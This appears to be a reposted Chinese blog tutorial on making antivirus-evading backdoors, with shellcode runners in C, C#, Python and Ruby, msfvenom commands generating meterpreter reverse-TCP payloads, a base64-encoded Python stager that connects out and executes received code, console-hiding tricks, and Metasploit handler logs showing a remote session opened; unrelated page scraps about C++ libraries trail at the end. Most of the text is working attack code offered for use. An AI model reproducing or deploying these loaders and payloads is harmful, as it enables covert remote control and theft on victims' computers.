    #pragma comment(linker, "/section:.data,RWE")                                 // 启用数据段可读写
    
    unsigned char shellcode[] =
    "\xd9\xc5\xd9\x74\x24\xf4\xba\x8b\xfc\x02\xdd\x5e\x2b\xc9\xb1"
    "\x56\x83\xee\xfc\x31\x56\x14\x03\x56\x9f\x1e\xf7\x21\x77\x5c"
    "\xf8\xd9\x87\x01\x70\x3c\xb6\x01\xe6\x34\xe8\xb1\x6c\x18\x04"
    "\x39\x20\x89\x9f\x4f\xed\xbe\x28\xe5\xcb\xf1\xa9\x56\x2f\x93"
    "\xca\xec\x3f\xcd\x34\xa2\x40\xc4";
    
    int main(int argc, char **argv)
    {
        __asm
        {
            lea eax, shellcode
                call eax
        }
        return 0;
    }

    此外出去上面的这种汇编形式,这里我也整理了其他的一些调用ShellCode的代码.

        //第1种方法     
        void RunShellCode_2()  
        {  
            ((void(*)(void))&shellcode)();  
        }  
          
        //第2种方法  
        void RunShellCode_3()  
        {  
            __asm  
            {  
                lea eax, shellcode;  
                jmp eax;  
            }  
        }  
          
        //第3种方法     
        void RunShellCode_4()  
        {  
            __asm  
            {  
                mov eax, offset shellcode;  
                jmp eax;  
            }  
        }  
          
        //第4种方法     
        void RunShellCode_5()  
        {  
            __asm  
            {  
                mov eax, offset shellcode;  
                _emit 0xFF;  
                _emit 0xE0;  
            }  
        }  

    3.在MFS控制主机,启动侦听程序.

    msf5 > use exploit/multi/handler
    msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf5 exploit(multi/handler) >
    msf5 exploit(multi/handler) > show options
    
    msf5 exploit(multi/handler) > set lhost 192.168.1.7
    lhost => 192.168.1.7
    msf5 exploit(multi/handler) > set lport 8888
    lport => 8888
    msf5 exploit(multi/handler) > exploit
    
    [*] Started reverse TCP handler on 192.168.1.7:8888

    启动我们的shellcode代码,就可看到反弹回一个shell.

    msf5 exploit(multi/handler) > exploit
    
    [*] Started reverse TCP handler on 192.168.1.7:8888
    [*] Sending stage (179779 bytes) to 192.168.1.2
    [*] Meterpreter session 1 opened (192.168.1.7:8888 -> 192.168.1.2:36805)
    
    meterpreter > sysinfo
    Computer        : lyshark
    OS              : Windows 10 (Build 19999).
    Architecture    : x64
    System Language : zh_CN
    Domain          : WORKGROUP
    Logged On Users : 2
    Meterpreter     : x86/windows
    meterpreter >

    通过C#语言编译后门

    C#的在Windows平台下的编译器名称是Csc.exe,如果你的.NET FrameWork SDK安装在C盘,那么你可以在C:\Windows\Microsoft.NET\Framework64目录中找到他的编译程序。为
    了使用方便,你可以手动把这个目录添加到Path环境变量中去。

    1.使用MSF工具生成后门ShellCode,并将这段ShellCode保存到lyshark.txt。

    [root@localhost ~]#  msfvenom --platform Windows -a x64 -p windows/x64/meterpreter/reverse_tcp_uuid \
    >                               LHOST=192.168.1.30 LPORT=8080 -b '\x00' \
    >                               -e x64/xor -i 10 -f csharp \
    >                                -o ./lyshark.txt

    2.将生成的ShellCode加入到加载程序中

    using System;
    using System.Runtime.InteropServices;
    namespace TCPMeterpreterProcess
    {
        class Program
        {
            static void Main(string[] args)
            {
        // 存放ShellCode代码
    byte[] shellcode = new byte[951] {
    0x48,0x31,0xc9,0x48,0x81,0xe9,0x8e,0xff,0xff,0xff,0x48,0x8d,0x05,0xef,0xff,
    0xff,0xff,0x48,0xbb,0xa9,0x1e,0xb2,0x1e,0x97,0xb9,0xdc,0x04,0x48,0x31,0x58,
    0x27,0x48,0x2d,0xf8,0xff,0xff,0xff,0xe2,0xf4,0xe1,0x2f,0x7b,0x56,0x16,0x50,
    0x4f,0xfb,0x56,0xe1,0xfa,0x93,0x92,0x56,0x23,0xfb,0x56,0x56,0x09,0x0c,0xb8,
    0x16,0xa5,0xb6,0x2c,0x64,0xbd,0x56,0xa6,0xe1,0xfb,0x4c,0x84,0xe6,0x4d,0xe1,
    0x68,0x5b,0x28,0x5e,0xb7,0x78,0x83,0x2d,0xfb,0x5b,0x2c,0xe9,0x79,0xf9,0x46,
    0xa9,0xfd,0x3c,0x2c,0xe9,0xce,0x0a,0x9a,0xfa,0x03,0xc7,0x18,0x47,0x90,0xc3,
    0x83,0x9d,0x4a,0xe4,0x9b,0x3b,0x7e,0x4e,0x34,0x53,0xf0,0x37,0xca,0x71,0x5e,
    0xfd,0x81,0x14,0x99,0x4e,0x7d,0xbf,0xdf,0x38,0x05,0x12,0xfb,0x4e,0x7d,0x08,
    0x2c,0x2b,0x42,0xe6,0xbc,0x1e,0x98,0x2a,0xf3,0xfd,0x31,0xa5,0x23,0xf9,0xaf,
    0xb8,0x68,0x4a,0xff,0x1f,0xf0,0x67,0xf1,0x92,0x67,0x9b,0xf3,0x35,0x9f,0xd0,
    0x3f,0x13,0xa2,0x1f,0xf5,0x68,0x9f,0xd0,0x88,0xe0,0xb6,0x88,0x26,0x71,0xaa,
    0xa9,0x0c,0xe6,0x67,0x2b,0x42,0xb0,0x28,0x02,0x38,0xa4,0xd0,0xe5,0xf8,0x63,
    0xb1,0x8c,0x35,0xf5,0x64,0x75,0x71,0xd5,0x06,0x42,0xb4,0x30,0xe0,0x73,0x29,
    0xd5,0x06,0xf5,0x47,0x80,0xbc,0xe3,0x0f,0x19,0x83,0x27,0x8c,0xf5,0xd4,0xc4,
    0xf1,0x62,0xd4,0x45,0x03,0x42,0x1a,0x7e,0x22,0x5f,0x91,0x0b,0x6d,0x0f,0x76,
    0xaa,0x59,0xe8,0x5f,0x8a,0xa8,0x8b,0x70,0xf9,0x59,0xe8,0xe8,0x79,0x28,0x5a,
    0xd8,0xb3,0x68,0x82,0xb5,0x86,0x6d,0xbf,0xc7,0x21,0xee,0x3a,0x58,0x3d,0xda,
    0x71,0x7d,0xf2,0xe3,0xf2,0x2e,0x3f,0x6a,0xf2,0x3b,0xbd,0x54,0x3c,0xaf,0xfa,
    0xee,0xf4,0x75,0xbd,0x54,0x8b,0x5c,0x51,0x36,0x2b,0x46,0x92,0xd9,0x8a,0x1f,
    0x3f,0xda,0x43,0xad,0x0a,0x86,0x3b,0x18,0x88,0x14,0xf9,0x7e,0x2c,0x47,0x3a,
    0x63,0x26,0x70,0xe4,0x8d,0x9b,0x89,0xbb,0xa6,0xa2,0x76,0xad,0x8d,0x9b,0x3e,
    0x48,0x1c,0x1f,0x95,0xca,0x0d,0x10,0x42,0xce,0x63,0x96,0xc1,0x75,0x3a,0x49,
    0x8e,0x0c,0xd4,0x58,0x7b,0xa6,0x0d,0xed,0xb3,0x23,0xd5,0x3a,0x16,0x90,0xba,
    0x23,0x32,0xe6,0x51,0x3c,0x52,0x90,0xba,0x94,0xc1,0xd7,0x4d,0xe5,0xcf,0xed,
    0x5f,0xe2,0xc1,0x23,0x65,0x8b,0x8a,0x27,0x68,0x24,0x85,0x94,0xab,0x31,0x59,
    0x2f,0x14,0x69,0xfc,0x19,0xa6,0x21,0x16,0xd3,0x5c,0xab,0x49,0xa8,0x1e,0xbf,
    0x47,0x85,0x14,0xdb,0xca,0x8c,0x06,0x66,0x44,0xb3,0x14,0x61,0x4a,0xf1,0x06,
    0x66,0x44,0xf3,0x14,0x61,0x6a,0xb9,0x06,0xe2,0xa1,0x99,0x16,0xa7,0x29,0x20,
    0x06,0xdc,0xd6,0x7f,0x60,0x8b,0x64,0xeb,0x62,0xcd,0x57,0x12,0x95,0xe7,0x59,
    0xe8,0x8f,0x0f,0xfb,0x81,0x1d,0xbb,0x50,0x62,0x1c,0xcd,0x9d,0x91,0x60,0xa2,
    0x19,0x39,0x28,0x6c,0x6e,0xcb,0x57,0xe8,0x17,0x6c,0x3c,0xed,0x16,0xd3,0xd7,
    0x6a,0x90,0xe9,0x4e,0xed,0x5e,0x56,0x9c,0x9e,0x7f,0xa1,0x4f,0x3d,0x46,0x58,
    0x14,0xf2,0x5c,0x62,0x0e,0xcd,0x5f,0xd2,0x8c,0x09,0x4e,0xa1,0xb1,0x24,0x57,
    0x58,0x68,0x62,0x50,0xe8,0x98,0xa0,0x27,0x1a,0x14,0xdb,0xd8,0x45,0x0f,0x2c,
    0xdf,0xde,0x1d,0xeb,0xd9,0xd1,0xae,0x98,0xe7,0x9f,0x5f,0xa6,0x3c,0xe1,0x0b,
    0xd4,0xc7,0xa6,0x84,0xb2,0x5c,0x62,0x0e,0xc9,0x5f,0xd2,0x8c,0x8c,0x59,0x62,
    0x42,0xa5,0x52,0x58,0x1c,0xf6,0x51,0xe8,0x9e,0xac,0x9d,0xd7,0xd4,0xa2,0x19,
    0x39,0x0f,0xb5,0x57,0x8b,0x02,0xb3,0x42,0xa8,0x16,0xac,0x4f,0x92,0x06,0xa2,
    0x9b,0x05,0x6e,0xac,0x44,0x2c,0xbc,0xb2,0x59,0xb0,0x14,0xa5,0x9d,0xc1,0xb5,
    0xa1,0xe7,0x16,0xb1,0xb0,0x5f,0x6d,0x2b,0x99,0x2a,0xb6,0x7d,0xdf,0x16,0xd3,
    0x1d,0xbc,0x51,0x60,0xa8,0xa5,0x97,0x3f,0xfc,0xeb,0x18,0xe9,0x07,0x64,0xf3,
    0x9a,0xe0,0xe8,0x18,0xf6,0xde,0x2d,0xbe,0xd2,0x42,0xab,0x4c,0xa0,0xc7,0x09,
    0x5a,0x5a,0xad,0xab,0xa2,0xa5,0x39,0xcb,0x11,0x2c,0x89,0xa6,0x91,0x03,0x26,
    0xec,0x17,0xd3,0x5c,0xb3,0x59,0x53,0x67,0x6d,0x7d,0xd3,0xa3,0x3f,0x72,0xe3,
    0x0f,0xb3,0x46,0x83,0x11,0xdb,0xd1,0xa4,0x7f,0x2d,0x5e,0x2c,0x9c,0xa2,0x91,
    0x2b,0x06,0x12,0xd6,0x9b,0xd5,0x2b,0x59,0x53,0xa4,0xe2,0xc9,0x33,0xa3,0x3f,
    0x50,0x60,0x89,0x87,0x06,0x92,0x04,0xa6,0x91,0x0b,0x06,0x64,0xef,0x92,0xe6,
    0x73,0xbd,0x9d,0x2f,0x12,0xc3,0x56,0x9c,0x9e,0x12,0xa0,0xb1,0x23,0x63,0x36,
    0xb4,0x56,0x18,0xe9,0x4e,0xa0,0x27,0x1a,0x36,0xfa,0x59,0xb1,0xa6,0xfd,0x16,
    0xd3,0x5c,0x8a,0xc6,0x40,0xf6,0xf2,0x4c,0xe3,0xb5,0xa8,0x07,0xaa,0x53,0xf2,
    0x47,0xfa,0x74,0xb0,0x50,0x60,0xb7,0xa4,0xd1,0x11,0x9e,0x01,0x20,0xb6,0xb1,
    0x38,0x5e,0x50,0xb0,0xfa,0x50,0x60,0xac,0xa0,0x27,0x1a,0x36,0xee,0x59,0xb1,
    0x06,0x64,0xef,0x92,0xe6,0xe8,0xc1,0x21,0x11,0x12,0xc3,0x50,0xa4,0xea,0x66,
    0xbc,0x06,0x6e,0xd2,0xf3,0x02,0x63,0xee,0x83,0x0e,0xac,0x4f,0xbb,0x5c,0xfa,
    0x18,0xe9,0x0f,0xb5,0x5e,0x5a,0xae,0xa2,0x29,0x20,0x0f,0x57,0x4e,0x77,0x0f,
    0x0f,0xe7,0x3c,0x06,0x64,0xd5,0x9a,0xd5,0x2d,0x55,0xd8,0x87,0xa4,0x9f,0x23,
    0x14,0x63,0xc2,0xa1,0xc7,0x14,0x57,0x69,0x5e,0x33,0xd0,0xb6,0xb1,0x38,0x95,
    0x2b,0x5c,0x97,0x30,0xb1,0x0f,0xba,0x4f,0xbb,0x5c,0xaa,0x18,0xe9,0x0f,0xb5,
    0x7c,0xd3,0x06,0xab,0xa2,0xe2,0x61,0xe2,0x26,0x2c,0x89,0xbd,0x41,0xa8,0xf4,
    0x98,0x78,0x9e,0x3d,0x15,0xcd,0xa0,0xb1,0x23,0xff,0xc0,0xa3,0x15,0xe7,0xa1,
    0x4f,0x2e,0x5e,0xfa,0x9a,0xa2,0x9d,0x1f,0x3b,0x59,0x57,0x2c,0xbb,0xb2,0x72,
    0xe9,0x17,0xa4,0xd1,0x11,0xac,0x5f,0xba,0xbf,0xb1,0x38,0x16,0x6f,0x72,0x42,
    0xa6,0x2a,0x60,0xb1,0xd3,0x04 };
    
                UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
    MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
    IntPtr hThread = IntPtr.Zero;
    UInt32 threadId = 0;
    // prepare data
    IntPtr pinfo = IntPtr.Zero;
    // execute native code
    hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
    WaitForSingleObject(hThread, 0xFFFFFFFF);
    }
            private static UInt32 MEM_COMMIT = 0x1000;
    private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
    [DllImport("kernel32")]
            private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
    UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
    [DllImport("kernel32")]
            private static extern bool VirtualFree(IntPtr lpAddress,
    UInt32 dwSize, UInt32 dwFreeType);
    [DllImport("kernel32")]
            private static extern IntPtr CreateThread(
    UInt32 lpThreadAttributes,
    UInt32 dwStackSize,
    UInt32 lpStartAddress,
    IntPtr param,
    UInt32 dwCreationFlags,
    ref UInt32 lpThreadId
    );
    [DllImport("kernel32")]
            private static extern bool CloseHandle(IntPtr handle);
    [DllImport("kernel32")]
            private static extern UInt32 WaitForSingleObject(
    IntPtr hHandle,
    UInt32 dwMilliseconds
    );
    [DllImport("kernel32")]
            private static extern IntPtr GetModuleHandle(
    string moduleName
    );
    [DllImport("kernel32")]
            private static extern UInt32 GetProcAddress(
    IntPtr hModule,
    string procName
    );
    [DllImport("kernel32")]
            private static extern UInt32 LoadLibrary(
    string lpFileName
    );
    [DllImport("kernel32")]
            private static extern UInt32 GetLastError();
    }
    }

    3.使用C#编译器编译这段代码,这里我保存为了lyshark.cs你可以自行命名,最终编译出来的代码才5kb不到。

    C:\Users\lyshark\Desktop>csc /unsafe /platform:x64 /out:lyshark.exe lyshark.cs
    Microsoft (R) Visual C# Compiler version 4.7.3190.0
    for C# 5
    Copyright (C) Microsoft Corporation. All rights reserved.

    4.接着运行程序,回到MSF控制台启动监听。

    msf5 > use exploit/multi/handler
    msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf5 exploit(multi/handler) > set lhost 192.168.1.30
    lhost => 192.168.1.7
    msf5 exploit(multi/handler) > set lport 8080
    lport => 8080
    
    msf5 exploit(multi/handler) > set exitonsession false
    exitonsession => false
    msf5 exploit(multi/handler) > set enablecontextencoding true
    enablecontextencoding => true
    msf5 exploit(multi/handler) > set Stageencoder x64/xor
    Stageencoder => x64/xor
    msf5 exploit(multi/handler) > set stageencodingfallback false
    stageencodingfallback => false
    msf5 exploit(multi/handler) > exploit -j -z

    5.客户端运行后门。

    C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile=
    /LogToConsole=false /U lyshark.exe

    通过Python语言编译后门

    1.首先生成利用代码,将内容写入到lyshark.py文件中。

    [root@localhost ~]# msfvenom -p python/meterpreter/reverse_tcp \
    > lhost=192.168.1.30 lport=8888 \
    > -f raw -o lyshark.py

    2.手动复制这段生成后的代码片段。

    [root@localhost ~]# cat lyshark.py 
    import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMS4zMCcsODg4OCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=')))

    3.我们在其上方加入一段屏蔽控制台窗口的代码,来实现隐藏控制台窗口,最终代码如下。

    import base64,sys;
    import ctypes
    
    whnd = ctypes.windll.kernel32.GetConsoleWindow()
    if whnd != 0:
        ctypes.windll.user32.ShowWindow(whnd, 0)
        ctypes.windll.kernel32.CloseHandle(whnd)
    
    exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMS4zMCcsODg4OCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=')))

    4.使用pyinstaller封装成可执行程序,这里使用-F封装成单个.exe文件,如果没有的话可以在命令行执行 pip install pyinstaller 安装这个工具。

    C:\Users\lyshark\Desktop>pyinstaller -F lyshark.py
    107 INFO: PyInstaller: 3.4
    108 INFO: Python: 3.7.3
    109 INFO: Platform: Windows-10-10.0.17763-SP0
    113 INFO: wrote C:\Users\lyshark\Desktop\lyshark.spec
    116 INFO: UPX is not available.
    120 INFO: Extending PYTHONPATH with paths
    ['C:\\Users\\lyshark\\Desktop', 'C:\\Users\\lyshark\\Desktop']
    121 INFO: checking Analysis
    121 INFO: Building Analysis because Analysis-00.toc is non existent
    121 INFO: Initializing module dependency graph...
    124 INFO: Initializing module graph hooks...
    129 INFO: Analyzing base_library.zip ...

    5.在MSF控制台,打开一个监听事件,并运行生成的二进制后门 lyshark.exe 完美实现免杀。

    msf5 > use exploit/multi/handler 
    msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf5 exploit(multi/handler) >  set lhost 192.168.1.30
    lhost => 192.168.1.30
    msf5 exploit(multi/handler) >  set lport 8888
    lport => 8888
    msf5 exploit(multi/handler) > exploit -j -z
    [*] Exploit running as background job 0.
    [*] Exploit completed, but no session was created.
    
    [*] Started reverse TCP handler on 192.168.1.30:8888 
    msf5 exploit(multi/handler) > sessions -i

    当下,除了白名单上线外,python后门的稳定性一直很高,这也是因为python是脚本的原因,杀软并没有重视这一块。

    1379525-20190810173118403-3458415.png

    通过Ruby语言编译后门

    [root@localhost ~]#  msfvenom -p ruby/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.rb
    [root@localhost ~]#  msfvenom ‐p windows/messagebox TEXT=Micropoor TITLE=Micropoor ‐f ruby ‐‐smallest
    require 'fiddle'
    require 'fiddle/import'
    require 'fiddle/types'
    
    shellcode =
    "\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64" +
    "\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e" +
    "\x20\x8b\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60" +
    "\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b" +
    "\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01" +
    "\xee\x31\xff\x31\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d"
    
    include Fiddle
    
    kernel32 = Fiddle.dlopen('kernel32')
    ptr = Function.new(kernel32['VirtualAlloc'], [4,4,4,4], 4).call(0, shellcode.size, 0x3000, 0x40)
    Function.new(kernel32['VirtualProtect'], [4,4,4,4], 4).call(ptr, shellcode.size, 0, 0)
    
    buf = Fiddle::Pointer[shellcode]
    
    Function.new(kernel32['RtlMoveMemory'], [4, 4, 4], 4).call(ptr, buf, s
    hellcode.size)
    thread = Function.new(kernel32['CreateThread'], [4,4,4,4,4,4],4).call(0, 0, ptr, 0, 0, 0)
    Function.new(kernel32['WaitForSingleObject'], [4,4], 4).call(thread,‐1)

    转载于:https://www.cnblogs.com/LyShark/p/11331476.html

    展开全文
  • CLI11:单文件或多文件的C++11库,用于简单和高级的CLI解析,只有头文件。 jarro2783/cxxopts:轻量级的C++命令行选项解析器。 docopt.cpp:从文档字符串生成选项解析的库。 gflags:C++的命令行标志模块。 ...

空空如也

空空如也

1 2 3 4
收藏数 78
精华内容 31
关键字:

c语言文件的三大特征

c语言 订阅